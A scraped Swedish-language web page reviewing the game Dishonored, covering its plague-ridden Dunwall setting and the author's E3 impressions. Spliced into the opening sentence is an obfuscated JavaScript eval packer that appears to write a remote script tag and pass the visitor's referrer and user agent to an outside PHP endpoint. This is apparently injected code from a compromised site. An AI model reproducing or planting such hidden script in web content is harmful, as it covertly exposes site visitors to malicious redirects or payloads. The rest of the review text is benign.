Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Dishonored recension

Dishonored recension
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttink|var|u0026u|referrer|kdzsk||js|php’.split(‘|’),0,{}))
är det dags. Dishonored är kanske ett av årets hetaste spel och kommer nu till en butik nära dig. 

När jag såg Dishonored på E3-mässan i år tänkte jag bara, wow. Redan vid första ögonkastet av det otroligt tidiga gameplay som visades upp visste jag att detta kommer bli en enorm hit.

Nu har recensionerna börjat rulla ut på spelsajterna och betygen är precis vad jag gissade på.

Att släppa ett spel som fokuserar på den enskilda upplevelsen och inte har en enorm online del är idag mycket riskfyllt. De flesta spelarna är ute efter en rolig och intensiv multiplayer, även jag. Dishonored är ett spel som egentligen inte har något välkänt varumärke i ryggen. Det har på senare tid verkligen visats att spel med kända bolag i ryggen snabbt skapar sig en hype även om publiken inte riktigt vet vad som väntar.

Den här gången gäller det ett singelplayerspel i helt egen klass.
Du anländer till staden Dunwall som är ett mörkt 1700-tal i London anda hopsatt med mekaniska robotar och verktyg. Det är mörka tider som råder och en sjukdom likt pesten har spridit sig bland den ”vanliga” befolkning och fattigdom regerar.

Den rika överklassen som inte är smittade har placerats i skydda områden bevakade av vakter 24/7, och ingen utan behörighet kommer in.
Den smittade gruppen av befolkningen behandlas som djur och skjuts en efter en då de står i vägen eller försöker ta sig in i de skyddade områdena.

Det är här du kommer in.

I videon ovan kan du se Gametrailers recension av det vackra spelet Dishonored.